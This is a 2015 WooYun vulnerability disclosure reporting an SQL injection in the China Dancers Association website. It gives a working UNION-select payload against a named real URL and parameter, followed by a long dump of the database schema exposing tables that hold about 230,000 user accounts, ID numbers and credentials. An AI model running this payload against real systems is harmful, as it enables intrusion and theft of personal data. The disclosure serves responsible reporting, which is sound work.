当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128315

漏洞标题:中国舞蹈家协会SQL漏洞,(20W+用户敏感信息泄漏)

相关厂商:cncert国家互联网应急中心

漏洞作者: 渔村安全实验室

提交时间:2015-07-22 11:31

修复时间:2015-09-10 08:14

公开时间:2015-09-10 08:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

详细说明:

http://www.cdanet.org/phpcq/index.php?zid=9
注入参数 : zid
http://www.cdanet.org/phpcq/index.php?zid=99999.9'+union+all+select+1,concat(0x7e,0x21,user(),0x21,0x7e),1--+a

2015-07-22_111634.png


pre_common_member
count:234801
uid
email
username
password
status
emailstatus
avatarstatus
videophotostatus
adminid
groupid
groupexpiry
extgroupids
regdate
credits
notifysound
timeoffset
newpm
newprompt
accessmasks
allowadmincp
onlyacceptfriendpm
conisbind
freeze


23W+用户数据

2015-07-22_112052.png


<code>
c_dance
home_ad
count:0
adid
available
title
pagetype
adcode
system
home_adminsession
count:0
uid
ip
dateline
errorcount
home_album
count:0
albumid
albumname
uid
username
dateline
updatetime
picnum
pic
picflag
friend
password
target_ids
home_appcreditlog
count:0
logid
uid
appid
appname
type
credit
note
dateline
home_blacklist
count:0
uid
buid
dateline
home_block
count:0
bid
blockname
blocksql
cachename
cachetime
startnum
num
perpage
htmlcode
home_blog
count:0
blogid
topicid
uid
username
subject
classid
viewnum
replynum
hot
dateline
pic
picflag
noreply
friend
password
click_1
click_2
click_3
click_4
click_5
home_blogfield
count:0
blogid
uid
tag
message
postip
related
relatedtime
target_ids
hotuser
magiccolor
magicpaper
magiccall
home_cache
count:0
cachekey
value
mtime
home_class
count:0
classid
classname
uid
dateline
home_click
count:15
clickid
name
icon
idtype
displayorder
home_clickuser
count:0
uid
username
id
idtype
clickid
dateline
home_comment
count:0
cid
uid
id
idtype
authorid
author
ip
dateline
message
magicflicker
home_config
count:100
var
datavalue
home_creditlog
count:2
clid
uid
rid
total
cyclenum
credit
experience
starttime
info
user
app
dateline
home_creditrule
count:47
rid
rulename
action
cycletype
cycletime
rewardnum
rewardtype
norepeat
credit
experience
home_cron
count:5
cronid
available
type
name
filename
lastrun
nextrun
weekday
day
hour
minute
home_data
count:6
var
datavalue
dateline
home_docomment
count:0
id
upid
doid
uid
username
dateline
message
ip
grade
home_doing
count:0
doid
uid
username
from
dateline
message
ip
replynum
mood
home_event
count:0
eventid
topicid
uid
username
dateline
title
classid
province
city
location
poster
thumb
remote
deadline
starttime
endtime
public
membernum
follownum
viewnum
grade
recommendtime
tagid
picnum
threadnum
updatetime
hot
home_eventclass
count:6
classid
classname
poster
template
displayorder
home_eventfield
count:0
eventid
detail
template
limitnum
verify
allowpic
allowpost
allowinvite
allowfellow
hotuser
home_eventinvite
count:0
eventid
uid
username
touid
tousername
dateline
home_eventpic
count:0
picid
eventid
uid
username
dateline
home_feed
count:0
feedid
appid
icon
uid
username
dateline
friend
hash_template
hash_data
title_template
title_data
body_template
body_data
body_general
image_1
image_1_link
image_2
image_2_link
image_3
image_3_link
image_4
image_4_link
target_ids
id
idtype
hot
home_friend
count:0
uid
fuid
fusername
status
gid
note
num
dateline
home_friendguide
count:0
uid
fuid
fusername
num
home_friendlog
count:0
uid
fuid
action
dateline
home_invite
count:0
id
uid
code
fuid
fusername
type
email
appid
home_log
count:0
logid
id
idtype
home_magic
count:25
mid
name
description
forbiddengid
charge
experience
provideperoid
providecount
useperoid
usecount
displayorder
custom
close
home_magicinlog
count:0
logid
uid
username
mid
count
type
fromid
credit
dateline
home_magicstore
count:0
mid
storage
lastprovide
sellcount
sellcredit
home_magicuselog
count:0
logid
uid
username
mid
id
idtype
count
data
dateline
expire
home_mailcron
count:0
cid
touid
email
sendtime
home_mailqueue
count:0
qid
cid
subject
message
dateline
home_member
count:1
uid
username
password
home_mtag
count:0
tagid
tagname
fieldid
membernum
threadnum
postnum
close
announcement
pic
closeapply
joinperm
viewperm
threadperm
postperm
recommend
moderator
home_mtaginvite
count:0
uid
tagid
fromuid
fromusername
dateline
home_myapp
count:0
appid
appname
narrow
flag
version
displaymethod
displayorder
home_myinvite
count:0
id
typename
appid
type
fromuid
touid
myml
dateline
hash
home_notification
count:0
id
uid
type
new
authorid
author
note
dateline
home_pic
count:0
picid
albumid
topicid
uid
username
dateline
postip
filename
title
type
size
filepath
thumb
remote
hot
click_6
click_7
click_8
click_9
click_10
magicframe
home_picfield
count:0
picid
hotuser
home_poke
count:0
uid
fromuid
fromusername
note
dateline
iconid
home_poll
count:0
pid
topicid
uid
username
subject
voternum
replynum
multiple
maxchoice
sex
noreply
credit
percredit
expiration
lastvote
dateline
hot
home_pollfield
count:0
pid
notify
message
summary
option
invite
hotuser
home_polloption
count:0
oid
pid
votenum
option
home_polluser
count:0
uid
username
pid
option
dateline
home_post
count:0
pid
tagid
tid
uid
username
ip
dateline
message
pic
isthread
hotuser
home_profield
count:3
fieldid
title
note
formtype
inputnum
choice
mtagminnum
manualmoderator
manualmember
displayorder
home_profilefield
count:0
fieldid
title
note
formtype
maxsize
required
invisible
allowsearch
choice
displayorder
home_report
count:0
rid
id
idtype
new
num
dateline
reason
uids
home_session
count:0
uid
username
password
lastactivity
ip
magichidden
home_share
count:0
sid
topicid
type
uid
username
dateline
title_template
body_template
body_data
body_general
image
image_link
hot
hotuser
home_show
count:0
uid
username
credit
note
home_space
count:1
uid
groupid
credit
experience
username
name
namestatus
videostatus
domain
friendnum
viewnum
notenum
addfriendnum
mtaginvitenum
eventinvitenum
myinvitenum
pokenum
doingnum
blognum
albumnum
threadnum
pollnum
eventnum
sharenum
dateline
updatetime
lastsearch
lastpost
lastlogin
lastsend
attachsize
addsize
addfriend
flag
newpm
avatar
regip
ip
mood
home_spacefield
count:1
uid
sex
email
newemail
emailcheck
mobile
qq
msn
msnrobot
msncstatus
videopic
birthyear
birthmonth
birthday
blood
marry
birthprovince
birthcity
resideprovince
residecity
note
spacenote
authstr
theme
nocss
menunum
css
privacy
friend
feedfriend
sendmail
magicstar
magicexpire
timeoffset
home_spaceinfo
count:0
infoid
uid
type
subtype
title
subtitle
friend
startyear
endyear
startmonth
endmonth
home_spacelog
count:0
uid
username
opuid
opusername
flag
expiration
dateline
home_stat
count:1
daytime
login
register
invite
appinvite
doing
blog
pic
poll
event
share
thread
docomment
blogcomment
piccomment
pollcomment
pollvote
eventcomment
eventjoin
sharecomment
post
wall
poke
click
home_statuser
count:1
uid
daytime
type
home_tag
count:0
tagid
tagname
uid
dateline
blognum
close
home_tagblog
count:0
tagid
blogid
home_tagspace
count:0
tagid
uid
username
grade
home_task
count:7
taskid
available
name
note
num
maxnum
image
filename
starttime
endtime
nexttime
nexttype
credit
displayorder
home_thread
count:0
tid
topicid
tagid
eventid
subject
magiccolor
magicegg
uid
username
dateline
viewnum
replynum
lastpost
lastauthor
lastauthorid
displayorder
digest
hot
click_11
click_12
click_13
click_14
click_15
home_topic
count:0
topicid
uid
username
subject
message
jointype
joingid
pic
thumb
remote
joinnum
lastpost
dateline
endtime
home_topicuser
count:0
id
uid
topicid
username
dateline
home_userapp
count:0
uid
appid
appname
privacy
allowsidenav
allowfeed
allowprofilelink
narrow
menuorder
displayorder
home_userappfield
count:0
uid
appid
profilelink
myml
home_userevent
count:0
eventid
uid
username
dateline
status
fellow
template
home_usergroup
count:9
gid
grouptitle
system
banvisit
explower
maxfriendnum
maxattachsize
allowhtml
allowcomment
searchinterval
searchignore
postinterval
spamignore
videophotoignore
allowblog
allowdoing
allowupload
allowshare
allowmtag
allowthread
allowpost
allowcss
allowpoke
allowfriend
allowpoll
allowclick
allowevent
allowmagic
allowpm
allowviewvideopic
allowmyop
allowtopic
allowstat
magicdiscount
verifyevent
edittrail
domainlength
closeignore
seccode
color
icon
manageconfig
managenetwork
manageprofilefield
manageprofield
manageusergroup
managefeed
manageshare
managedoing
manageblog
managetag
managetagtpl
managealbum
managecomment
managemtag
managethread
manageevent
manageeventclass
managecensor
managead
managesitefeed
managebackup
manageblock
managetemplate
managestat
managecache
managecredit
managecron
managename
manageapp
managetask
managereport
managepoll
manageclick
managemagic
managemagiclog
managebatch
managedelspace
managetopic
manageip
managehotuser
managedefaultuser
managespacegroup
managespaceinfo
managespacecredit
managespacenote
managevideophoto
managelog
magicaward
home_userlog
count:0
uid
action
type
dateline
home_usermagic
count:0
uid
username
mid
count
home_usertask
count:0
uid
username
taskid
credit
dateline
isignore
home_visitor
count:0
uid
vuid
vusername
dateline
pre_common_admincp_cmenu
count:10
id
title
url
sort
displayorder
clicks
uid
dateline
pre_common_admincp_group
count:5
cpgroupid
cpgroupname
pre_common_admincp_member
count:1
uid
cpgroupid
customperm
pre_common_admincp_perm
count:68
cpgroupid
perm
pre_common_admincp_session
count:1
uid
adminid
panel
ip
dateline
errorcount
storage
pre_common_admingroup
count:7
admingid
alloweditpost
alloweditpoll
allowstickthread
allowmodpost
allowdelpost
allowmassprune
allowrefund
allowcensorword
allowviewip
allowbanip
allowedituser
allowmoduser
allowbanuser
allowbanvisituser
allowpostannounce
allowviewlog
allowbanpost
supe_allowpushthread
allowhighlightthread
allowlivethread
allowdigestthread
allowrecommendthread
allowbumpthread
allowclosethread
allowmovethread
allowedittypethread
allowstampthread
allowstamplist
allowcopythread
allowmergethread
allowsplitthread
allowrepairthread
allowwarnpost
allowviewreport
alloweditforum
allowremovereward
allowedittrade
alloweditactivity
allowstickreply
allowmanagearticle
allowaddtopic
allowmanagetopic
allowdiy
allowclearrecycle
allowmanagetag
alloweditusertag
managefeed
managedoing
manageshare
manageblog
managealbum
managecomment
managemagiclog
managereport
managehotuser
managedefaultuser
managevideophoto
managemagic
manageclick
allowmanagecollection
allowmakehtml
pre_common_adminnote
count:0
id
admin
access
adminid
dateline
expiration
message
pre_common_advertisement
count:1
advid
available
type
displayorder
title
targets
parameters
code
starttime
endtime
pre_common_advertisement_custom
count:0
id
name
pre_common_banned
count:1
id
ip1
ip2
ip3
ip4
admin
dateline
expiration
pre_common_block
count:707
bid
blockclass
blocktype
name
title
classname
summary
uid
username
styleid
blockstyle
picwidth
picheight
target
dateformat
dateuformat
script
param
shownum
cachetime
cachetimerange
punctualupdate
hidedisplay
dateline
notinherited
isblank
pre_common_block_favorite
count:0
favid
uid
bid
dateline
pre_common_block_item
count:2308
itemid
bid
id
idtype
itemtype
title
url
pic
picflag
makethumb
thumbpath
summary
showstyle
related
fields
displayorder
startdate
enddate
pre_common_block_item_data
count:1
dataid
bid
id
idtype
itemtype
title
url
pic
picflag
makethumb
summary
showstyle
related
fields
displayorder
startdate
enddate
uid
username
dateline
isverified
verifiedtime
stickgrade
pre_common_block_permission
count:0
bid
uid
allowmanage
allowrecommend
needverify
inheritedtplname
pre_common_block_pic
count:194878
picid
bid
itemid
pic
picflag
type
pre_common_block_style
count:103
styleid
blockclass
name
template
hash
getpic
getsummary
makethumb
settarget
fields
moreurl
pre_common_block_xml
count:0
id
name
version
url
clientid
key
signtype
data
pre_common_cache
count:5
cachekey
cachevalue
dateline
pre_common_card
count:0
id
typeid
maketype
makeruid
price
extcreditskey
extcreditsval
status
dateline
cleardateline
useddateline
uid
pre_common_card_log
count:0
id
uid
username
cardrule
info
dateline
description
operation
pre_common_card_type
count:0
id
typename
pre_common_connect_guest
count:542
conopenid
conuin
conuinsecret
conqqnick
conuintoken
pre_common_credit_log
count:0
logid
uid
operation
relatedid
dateline
extcredits1
extcredits2
extcredits3
extcredits4
extcredits5
extcredits6
extcredits7
extcredits8
pre_common_credit_log_field
count:0
logid
title
text
pre_common_credit_rule
count:32
rid
rulename
action
cycletype
cycletime
rewardnum
norepeat
extcredits1
extcredits2
extcredits3
extcredits4
extcredits5
extcredits6
extcredits7
extcredits8
fids
pre_common_credit_rule_log
count:6199
clid
uid
rid
fid
total
cyclenum
extcredits1
extcredits2
extcredits3
extcredits4
extcredits5
extcredits6
extcredits7
extcredits8
starttime
dateline
pre_common_credit_rule_log_field
count:1026
clid
uid
info
user
app
pre_common_cron
count:21
cronid
available
type
name
filename
lastrun
nextrun
weekday
day
hour
minute
pre_common_devicetoken
count:0
uid
token
pre_common_district
count:45051
id
name
level
usetype
upid
displayorder
pre_common_diy_data
count:124
targettplname
tpldirectory
primaltplname
diycontent
name
uid
username
dateline
pre_common_domain
count:0
domain
domainroot
id
idtype
pre_common_failedip
count:11
ip
lastupdate
count
pre_common_failedlogin
count:21
ip
username
count
lastupdate
pre_common_friendlink
count:1
id
displayorder
name
url
description
logo
type
pre_common_grouppm
count:0
id
authorid
author
dateline
message
numbers
pre_common_invite
count:1
id
uid
code
fuid
fusername
type
email
inviteip
appid
dateline
endtime
regdateline
status
orderid
pre_common_magic
count:0
magicid
available
name
identifier
description
displayorder
credit
price
num
salevolume
supplytype
supplynum
useperoid
usenum
weight
magicperm
useevent
pre_common_magiclog
count:0
uid
magicid
action
dateline
amount
credit
price
targetid
idtype
targetuid
pre_common_mailcron
count:0
cid
touid
email
sendtime
pre_common_mailqueue
count:0
qid
cid
subject
message
dateline
pre_common_member
count:234801
uid
email
username
password
status
emailstatus
avatarstatus
videophotostatus
adminid
groupid
groupexpiry
extgroupids
regdate
credits
notifysound
timeoffset
newpm
newprompt
accessmasks
allowadmincp
onlyacceptfriendpm
conisbind
freeze
pre_common_member_action_log
count:40
id
uid
action
dateline
pre_common_member_connect
count:1526
uid
conuin
conuinsecret
conopenid
conisfeed
conispublishfeed
conispublisht
conisregister
conisqzoneavatar
conisqqshow
conuintoken
pre_common_member_count
count:234500
uid
extcredits1
extcredits2
extcredits3
extcredits4
extcredits5
extcredits6
extcredits7
extcredits8
friends
posts
threads
digestposts
doings
blogs
albums
sharings
attachsize
views
oltime
todayattachs
todayattachsize
feeds
follower
following
newfollower
blacklist
pre_common_member_crime
count:12
cid
uid
operatorid
operator
action
reason
dateline
pre_common_member_field_forum
count:234500
uid
publishfeed
customshow
customstatus
medals
sightml
groupterms
authstr
groups
attentiongroup
pre_common_member_field_home
count:234500
uid
videophoto
spacename
spacedescription
domain
addsize
addfriend
menunum
theme
spacecss
blockposition
recentnote
spacenote
privacy
feedfriend
acceptemail
magicgift
stickblogs
pre_common_member_forum_buylog
count:0
uid
fid
credits
pre_common_member_grouppm
count:0
uid
gpmid
status
dateline
pre_common_member_log
count:0
uid
action
dateline
pre_common_member_magic
count:0
uid
magicid
num
pre_common_member_medal
count:0
uid
medalid
pre_common_member_newprompt
count:564343
uid
data
pre_common_member_profile
count:234499
uid
realname
gender
birthyear
birthmonth
birthday
constellation
zodiac
telephone
mobile
idcardtype
idcard
address
zipcode
nationality
birthprovince
birthcity
birthdist
birthcommunity
resideprovince
residecity
residedist
residecommunity
residesuite
graduateschool
company
education
occupation
position
revenue
affectivestatus
lookingfor
bloodtype
height
weight
alipay
icq
qq
yahoo
msn
taobao
site
bio
interest
field1
field2
field3
field4
field5
field6
field7
field8
pre_common_member_profile_setting
count:51
fieldid
available
invisible
needverify
title
description
displayorder
required
unchangeable
showincard
showinthread
showinregister
allowsearch
formtype
size
choices
validate
pre_common_member_security
count:0
securityid
uid
username
fieldid
oldvalue
newvalue
dateline
pre_common_member_secwhite
count:0
uid
dateline
pre_common_member_stat_field
count:0
optionid
fieldid
fieldvalue
hash
users
updatetime
pre_common_member_status
count:234500
uid
regip
lastip
port
lastvisit
lastactivity
lastpost
lastsendmail
invisible
buyercredit
sellercredit
favtimes
sharetimes
profileprogress
pre_common_member_validate
count:5
uid
submitdate
moddate
admin
submittimes
status
message
remark
pre_common_member_verify
count:7191
uid
verify1
verify2
verify3
verify4
verify5
verify6
verify7
pre_common_member_verify_info
count:53
vid
uid
username
verifytype
flag
field
dateline
pre_common_member_wechat
count:0
uid
openid
status
isregister
pre_common_member_wechatmp
count:4
uid
openid
status
pre_common_myapp
count:17
appid
appname
narrow
flag
version
userpanelarea
canvastitle
fullscreen
displayuserpanel
displaymethod
displayorder
appstatus
iconstatus
icondowntime
pre_common_myinvite
count:0
id
typename
appid
type
fromuid
touid
myml
dateline
hash
pre_common_mytask
count:0
uid
username
taskid
status
csc
dateline
pre_common_nav
count:74
id
parentid
name
title
url
identifier
target
type
available
displayorder
highlight
level
subtype
subcols
icon
subname
suburl
navtype
logo
pre_common_onlinetime
count:500595
uid
thismonth
total
lastupdate
pre_common_optimizer
count:28
k
v
pre_common_patch
count:2
serial
rule
note
status
dateline
pre_common_plugin
count:36
pluginid
available
adminid
name
identifier
description
datatables
directory
copyright
modules
version
pre_common_plugin_aliyunrec
count:1
cnzz_id
cnzz_username
cnzz_password
cnzz_info
pre_common_pluginvar
count:318
pluginvarid
pluginid
displayorder
title
description
variable
type
value
extra
pre_common_process
count:1
processid
expiry
extra
pre_common_regip
count:9
ip
dateline
count
pre_common_relatedlink
count:0
id
name
url
extent
pre_common_remote_port
count:0
id
idtype
useip
port
pre_common_report
count:0
id
urlkey
url
message
uid
username
dateline
num
opuid
opname
optime
opresult
fid
pre_common_searchindex
count:74
searchid
srchmod
keywords
searchstring
useip
uid
dateline
expiration
threadsortid
num
ids
pre_common_seccheck
count:426
ssid
dateline
code
succeed
verified
pre_common_secquestion
count:0
id
type
question
answer
pre_common_session
count:0
sid
ip1
ip2
ip3
ip4
uid
username
groupid
invisible
action
lastactivity
lastolupdate
fid
tid
pre_common_setting
count:467
skey
svalue
pre_common_smiley
count:85
id
typeid
displayorder
type
code
url
pre_common_sphinxcounter
count:0
indexid
maxid
pre_common_stat
count:993
daytime
login
mobilelogin
connectlogin
register
invite
appinvite
doing
blog
pic
poll
activity
share
thread
docomment
blogcomment
piccomment
sharecomment
reward
debate
trade
group
groupjoin
groupthread
grouppost
post
wall
poke
click
sendpm
friend
addfriend
pre_common_statuser
count:49
uid
daytime
type
pre_common_style
count:4
styleid
name
available
templateid
extstyle
pre_common_stylevar
count:180
stylevarid
styleid
variable
substitute
pre_common_syscache
count:158
cname
ctype
dateline
data
pre_common_tag
count:2430
tagid
tagname
status
pre_common_tagitem
count:11220
tagid
itemid
idtype
pre_common_task
count:0
taskid
relatedtaskid
available
name
description
icon
applicants
achievers
tasklimits
applyperm
scriptname
starttime
endtime
period
periodtype
reward
prize
bonus
displayorder
version
pre_common_taskvar
count:0
taskvarid
taskid
sort
name
description
variable
type
value
pre_common_template
count:4
templateid
name
directory
copyright
pre_common_template_block
count:479
targettplname
tpldirectory
bid
pre_common_template_permission
count:0
targettplname
uid
allowmanage
allowrecommend
needverify
inheritedtplname
pre_common_uin_black
count:0
uin
uid
dateline
pre_common_usergroup
count:27
groupid
radminid
type
system
grouptitle
creditshigher
creditslower
stars
color
icon
allowvisit
allowsendpm
allowinvite
allowmailinvite
maxinvitenum
inviteprice
maxinviteday
pre_common_usergroup_field
count:28
groupid
readaccess
allowpost
allowreply
allowpostpoll
allowpostreward
allowposttrade
allowpostactivity
allowdirectpost
allowgetattach
allowgetimage
allowpostattach
allowpostimage
allowvote
allowsearch
allowcstatus
allowinvisible
allowtransfer
allowsetreadperm
allowsetattachperm
allowposttag
allowhidecode
allowhtml
allowanonymous
allowsigbbcode
allowsigimgcode
allowmagics
disableperiodctrl
reasonpm
maxprice
maxsigsize
maxattachsize
maxsizeperday
maxthreadsperhour
maxpostsperhour
attachextensions
raterange
loginreward
mintradeprice
maxtradeprice
minrewardprice
maxrewardprice
magicsdiscount
maxmagicsweight
allowpostdebate
tradestick
exempt
maxattachnum
allowposturl
allowrecommend
allowpostrushreply
maxfriendnum
maxspacesize
allowcomment
allowcommentarticle
searchinterval
searchignore
allowblog
allowdoing
allowupload
allowshare
allowblogmod
allowdoingmod
allowuploadmod
allowsharemod
allowcss
allowpoke
allowfriend
allowclick
allowmagic
allowstat
allowstatdata
videophotoignore
allowviewvideophoto
allowmyop
magicdiscount
domainlength
seccode
disablepostctrl
allowbuildgroup
allowgroupdirectpost
allowgroupposturl
edittimelimit
allowpostarticle
allowdownlocalimg
allowdownremoteimg
allowpostarticlemod
allowspacediyhtml
allowspacediybbcode
allowspacediyimgcode
allowcommentpost
allowcommentitem
allowcommentreply
allowreplycredit
ignorecensor
allowsendallpm
allowsendpmmaxnum
maximagesize
allowmediacode
allowbegincode
allowat
allowsetpublishdate
allowfollowcollection
allowcommentcollection
allowcreatecollection
forcesecques
forcelogin
closead
buildgroupcredits
allowimgcontent
pre_common_visit
count:0
ip
view
pre_common_word
count:0
id
admin
type
find
replacement
extra
pre_common_word_type
count:2
id
typename
pre_connect_disktask
count:0
taskid
aid
uid
openid
filename
verifycode
status
dateline
downloadtime
extra
pre_connect_feedlog
count:9
flid
tid
uid
publishtimes
lastpublished
dateline
status
pre_connect_memberbindlog
count:1529
mblid
uid
uin
type
dateline
pre_connect_postfeedlog
count:0
flid
pid
uid
publishtimes
lastpublished
dateline
status
pre_connect_tthreadlog
count:9
twid
tid
conopenid
pagetime
lasttwid
nexttime
updatetime
dateline
pre_dsu_paulsign
count:46
uid
time
days
lasted
mdays
reward
lastreward
qdxq
todaysay
pre_dsu_paulsignemot
count:9
id
displayorder
qdxq
count
name
pre_dsu_paulsignset
count:1
id
todayq
yesterdayq
highestq
qdtidnumber
pre_forum_access
count:1
uid
fid
allowview
allowpost
allowreply
allowgetattach
allowgetimage
allowpostattach
allowpostimage
adminuser
dateline
pre_forum_activity
count:0
tid
uid
aid
cost
starttimefrom
starttimeto
place
class
gender
number
applynumber
expiration
ufield
credit
pre_forum_activityapply
count:0
applyid
tid
username
uid
message
verified
dateline
payment
ufielddata
pre_forum_announcement
count:5
id
author
subject
type
displayorder
starttime
endtime
message
groups
pre_forum_attachment
count:204
aid
tid
pid
uid
tableid
downloads
pre_forum_attachment_0
count:14
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_1
count:21
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_2
count:22
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_3
count:24
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_4
count:22
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_5
count:15
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_6
count:16
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_7
count:13
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_8
count:23
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_9
count:33
aid
tid
pid
uid
dateline
filename
filesize
attachment
remote
description
readperm
price
isimage
width
thumb
picid
pre_forum_attachment_exif
count:0
aid
exif
pre_forum_attachment_unused
count:0
aid
uid
dateline
filename
filesize
attachment
remote
isimage
width
thumb
pre_forum_attachtype
count:0
id
fid
extension
maxsize
pre_forum_bbcode
count:4
id
available
tag
icon
replacement
example
explanation
params
prompt
nest
displayorder
perm
pre_forum_collection
count:0
ctid
uid
username
name
dateline
follownum
threadnum
commentnum
desc
lastupdate
rate
ratenum
lastpost
lastsubject
lastposttime
lastposter
lastvisit
keyword
pre_forum_collectioncomment
count:0
cid
ctid
uid
username
message
dateline
useip
port
rate
pre_forum_collectionfollow
count:0
uid
username
ctid
dateline
lastvisit
pre_forum_collectioninvite
count:0
ctid
uid
dateline
pre_forum_collectionrelated
count:0
tid
collection
pre_forum_collectionteamworker
count:0
ctid
uid
name
username
lastvisit
pre_forum_collectionthread
count:0
ctid
tid
dateline
reason
pre_forum_creditslog
count:0
uid
fromto
sendcredits
receivecredits
send
receive
dateline
operation
pre_forum_debate
count:0
tid
uid
starttime
endtime
affirmdebaters
negadebaters
affirmvotes
negavotes
umpire
winner
bestdebater
affirmpoint
negapoint
umpirepoint
affirmvoterids
negavoterids
affirmreplies
negareplies
pre_forum_debatepost
count:0
pid
stand
tid
uid
dateline
voters
voterids
pre_forum_faq
count:0
id
fpid
displayorder
identifier
keyword
title
message
pre_forum_filter_post
count:10
tid
pid
postlength
pre_forum_forum
count:50
fid
fup
type
name
status
displayorder
styleid
threads
posts
todayposts
yesterdayposts
rank
oldrank
lastpost
domain
allowsmilies
allowhtml
allowbbcode
allowimgcode
allowmediacode
allowanonymous
allowpostspecial
allowspecialonly
allowappend
alloweditrules
allowfeed
allowside
recyclebin
modnewposts
jammer
disablewatermark
inheritedmod
autoclose
forumcolumns
catforumcolumns
threadcaches
alloweditpost
simple
modworks
allowglobalstick
level
commoncredits
archive
recommend
favtimes
sharetimes
disablethumb
disablecollect
pre_forum_forum_threadtable
count:0
fid
threadtableid
threads
posts
pre_forum_forumfield
count:51
fid
description
password
icon
redirect
attachextensions
creditspolicy
formulaperm
moderators
rules
threadtypes
threadsorts
viewperm
postperm
replyperm
getattachperm
postattachperm
postimageperm
spviewperm
seotitle
keywords
seodescription
supe_pushsetting
modrecommend
threadplugin
replybg
extra
jointype
gviewperm
membernum
dateline
lastupdate
activity
founderuid
foundername
banner
groupnum
commentitem
relatedgroup
picstyle
widthauto
noantitheft
noforumhidewater
noforumrecommend
livetid
price
pre_forum_forumrecommend
count:0
fid
tid
typeid
displayorder
subject
author
authorid
moderatorid
expiration
position
highlight
aid
filename
pre_forum_groupcreditslog
count:0
fid
uid
logdate
pre_forum_groupfield
count:7
fid
privacy
dateline
type
data
pre_forum_groupinvite
count:0
fid
uid
inviteuid
dateline
pre_forum_grouplevel
count:3
levelid
type
leveltitle
creditshigher
creditslower
icon
creditspolicy
postpolicy
specialswitch
pre_forum_groupuser
count:1
fid
uid
username
level
threads
replies
joindateline
lastupdate
privacy
pre_forum_hotreply_member
count:0
tid
pid
uid
attitude
pre_forum_hotreply_number
count:0
pid
tid
support
against
total
pre_forum_imagetype
count:3
typeid
available
name
type
displayorder
directory
pre_forum_medal
count:10
medalid
name
available
image
type
displayorder
description
expiration
permission
credit
price
pre_forum_medallog
count:0
id
uid
medalid
type
dateline
expiration
status
pre_forum_memberrecommend
count:0
tid
recommenduid
dateline
pre_forum_moderator
count:2
uid
fid
displayorder
inherited
pre_forum_modwork
count:35
uid
modaction
dateline
count
posts
pre_forum_newthread
count:193
tid
fid
dateline
pre_forum_onlinelist
count:10
groupid
displayorder
title
url
pre_forum_order
count:0
orderid
status
buyer
admin
uid
amount
price
submitdate
confirmdate
email
ip
pre_forum_poll
count:0
tid
overt
multiple
visible
maxchoices
isimage
expiration
pollpreview
voters
pre_forum_polloption
count:0
polloptionid
tid
votes
displayorder
polloption
voterids
pre_forum_polloption_image
count:0
aid
poid
tid
pid
uid
filename
filesize
attachment
remote
width
thumb
dateline
pre_forum_pollvoter
count:0
tid
uid
username
options
dateline
pre_forum_post
count:2983
pid
fid
tid
first
author
authorid
subject
dateline
message
useip
port
invisible
anonymous
usesig
htmlon
bbcodeoff
smileyoff
parseurloff
attachment
rate
ratetimes
status
tags
comment
replycredit
position
pre_forum_post_location
count:0
pid
tid
uid
mapx
mapy
location
pre_forum_post_moderate
count:6
id
status
dateline
pre_forum_post_tableid
count:227
pid
pre_forum_postcache
count:0
pid
comment
rate
dateline
pre_forum_postcomment
count:0
id
tid
pid
author
authorid
dateline
comment
score
useip
port
rpid
pre_forum_postlog
count:126
pid
tid
fid
uid
action
dateline
pre_forum_poststick
count:0
tid
pid
position
dateline
pre_forum_promotion
count:0
ip
uid
username
pre_forum_ratelog
count:0
pid
uid
username
extcredits
dateline
score
reason
pre_forum_relatedthread
count:0
tid
type
expiration
keywords
relatedthreads
pre_forum_replycredit
count:0
tid
extcredits
extcreditstype
times
membertimes
random
pre_forum_rsscache
count:100
lastupdate
fid
tid
dateline
forum
author
subject
description
guidetype
pre_forum_sofa
count:190
tid
fid
pre_forum_spacecache
count:2
uid
variable
value
expiration
pre_forum_statlog
count:9658
logdate
fid
type
value
pre_forum_thread
count:2793
tid
fid
posttableid
typeid
sortid
readperm
price
author
authorid
subject
dateline
lastpost
lastposter
views
replies
displayorder
highlight
digest
rate
special
attachment
moderated
closed
stickreply
recommends
recommend_add
recommend_sub
heats
status
isgroup
favtimes
sharetimes
stamp
icon
pushedaid
cover
replycredit
relatebytag
maxposition
bgcolor
comments
hidden
pre_forum_thread_moderate
count:264
id
status
dateline
pre_forum_threadaddviews
count:0
tid
addviews
pre_forum_threadcalendar
count:0
cid
fid
dateline
hotnum
pre_forum_threadclass
count:2
typeid
fid
name
displayorder
icon
moderators
pre_forum_threadclosed
count:0
tid
redirect
pre_forum_threaddisablepos
count:26
tid
pre_forum_threadhidelog
count:0
tid
uid
pre_forum_threadhot
count:0
cid
fid
tid
pre_forum_threadimage
count:78
tid
attachment
remote
pre_forum_threadlog
count:454
tid
fid
uid
otherid
action
expiry
dateline
pre_forum_threadmod
count:2143
tid
uid
username
dateline
expiration
action
status
magicid
stamp
reason
pre_forum_threadpartake
count:208
tid
uid
dateline
pre_forum_threadpreview
count:0
tid
relay
content
pre_forum_threadprofile
count:1
id
name
